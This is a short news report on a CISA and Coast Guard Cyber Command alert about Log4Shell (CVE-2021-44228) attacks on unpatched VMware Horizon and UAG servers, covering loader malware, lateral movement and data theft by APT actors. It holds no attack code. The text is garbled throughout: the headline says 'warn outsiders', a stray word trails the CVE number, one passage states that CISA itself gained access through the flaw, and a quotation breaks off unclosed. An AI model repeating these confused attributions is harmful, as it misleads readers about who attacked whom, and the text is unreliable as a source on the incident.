CISA and U.S. Coast Guard warn outsiders of Log4Shell attacks
CISA and U.S. Coast Guard warn outsiders of Log4Shell attacks.
The Cybersecurity and Infrastructure Security Agency (CISA) and the U.S. Coast Guard Cyber Command (CGCYBER) are warning organizations that unpatched VMWare Horizon and Unified Access Gateway (UAG) servers remain vulnerable to the vulnerability numbered CVE-2021-44228 Impact, this vulnerability is widely known as Log4Shell.
Government agencies say the vulnerability is being exploited by a range of threat actors, including state-backed groups.
As part of this exploit, suspected APT actors planted loader malware in compromised systems with embedded executables that could enable remote command and control.
In a confirmed breach, these APT actors were able to move laterally within the network, gain access to the disaster recovery network, and collect and exfiltrate sensitive data. In the second incident detailed in the alert, CISA said it was forced to conduct an on-site incident response activity.
In the attack, which began in late April and continued into May, CISA said it found the group had been compromised by multiple threat actor groups.
According to CISA, one of the groups has been in the group’s network since January, possibly even earlier.
CISA added that it gained access by exploiting a Log4Shell vulnerability in unpatched VMware Horizon servers.
By January 30, one of the groups started using PowerShell scripts and eventually managed to move laterally to other production hosts and servers.
The group was then able to use the compromised administrator account to run a loader malware.
“The loader malware appears to be a modified version of the SysInternals LogonSessions, Du, or PsPing software.
The embedded executable belongs to the same malware family, is similar in design and functionality to 658_dump_64.exe, and provides remote command and control ability.